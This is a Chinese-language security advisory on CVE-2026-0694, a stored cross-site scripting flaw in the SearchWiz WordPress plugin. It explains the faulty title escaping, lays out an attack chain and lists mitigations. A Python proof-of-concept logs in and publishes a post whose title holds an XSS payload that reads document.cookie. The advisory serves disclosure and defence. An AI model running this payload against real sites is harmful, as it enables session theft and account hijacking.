CVE-2026-0694 WordPress SearchWiz插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2026-0694

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SearchWiz WordPress Plugin

漏洞概述

SearchWiz是WordPress的一个搜索插件，用于增强站点的搜索功能。该插件在1.0.0及之前的所有版本中存在一个存储型跨站脚本(XSS)漏洞。漏洞的根本原因在于插件在搜索结果中输出文章标题时，使用了esc_attr()函数进行过滤，而不是更安全的esc_html()函数。esc_attr()函数主要用于转义HTML属性值，对于普通的文本内容输出不够安全，可能允许攻击者注入恶意JavaScript脚本。由于这是存储型XSS漏洞，恶意代码会被永久保存在数据库中（文章标题字段），任何访问搜索结果页面的用户都会触发该脚本执行。攻击者利用此漏洞可以窃取用户会话cookie、劫持用户账户、执行恶意操作或重定向用户到钓鱼网站。

技术细节

漏洞位于SearchWiz插件的public/class-sw-ajax.php文件第616行附近。当用户在WordPress站点执行搜索时，插件会从数据库中检索匹配的文章，并将文章标题显示在搜索结果页面中。问题出在输出文章标题时，代码使用了esc_attr()函数进行转义。esc_attr()函数是WordPress提供的用于转义HTML属性的函数，它会将特殊字符转换为HTML实体（如将<转换为<），但这种转义方式在某些浏览器上下文中可以被绕过。相比之下，esc_html()函数会进行更彻底的HTML编码，更适合用于输出纯文本内容。攻击者只需在文章标题中嵌入JavaScript代码，如：<img src=x onerror=alert(document.cookie)>，当其他用户搜索并查看结果时，该脚本就会在用户浏览器中执行。由于插件直接输出标题而没有进行充分的HTML编码，恶意脚本会被浏览器解析执行。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标网站使用的WordPress版本和SearchWiz插件版本

STEP 2

Authentication

攻击者获得WordPress账户（需要贡献者级别或更高权限）

STEP 3

Payload Injection

攻击者创建或编辑文章，在文章标题中注入恶意JavaScript代码，如<img src=x onerror=alert(document.cookie)>

STEP 4

Payload Storage

恶意代码被保存到数据库的文章标题字段中

STEP 5

Trigger

受害者访问搜索结果页面，插件从数据库读取包含XSS的文章标题

STEP 6

Execution

由于插件使用esc_attr()而非esc_html()，恶意脚本被浏览器解析执行

STEP 7

Impact

攻击者成功窃取用户会话cookie、劫持账户或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# WordPress SearchWiz Plugin Stored XSS PoC
# CVE-2026-0694
# Target: WordPress site with SearchWiz plugin <= 1.0.0

import requests
from bs4 import BeautifulSoup

target_url = "http://target-wordpress-site.com"
username = "attacker_account"
password = "attacker_password"

session = requests.Session()

# Step 1: Login to WordPress
login_url = f"{target_url}/wp-login.php"
login_data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In"
}
session.post(login_url, data=login_data)

# Step 2: Create a post with XSS payload in title
post_url = f"{target_url}/wp-admin/post-new.php"
xss_payload = '<img src=x onerror=alert(document.cookie)>'
post_data = {
    "post_title": xss_payload,
    "post_content": "Test content",
    "post_status": "publish",
    "publish": "Publish"
}
session.post(post_url, data=post_data)

# Step 3: When victim searches, XSS will be triggered
# Search URL: {target_url}/?s=<search_term>
# The XSS in post title will execute in victim's browser

影响范围

SearchWiz WordPress Plugin <= 1.0.0

防御指南

临时缓解措施

如果无法立即更新插件，可以采取以下临时措施：1) 限制用户注册和文章发布权限，只允许可信用户创建内容；2) 使用Web应用防火墙(WAF)过滤恶意请求；3) 实施严格的Content Security Policy；4) 考虑暂时禁用SearchWiz插件直到官方修复发布；5) 对现有文章标题进行清理，移除潜在的XSSpayload。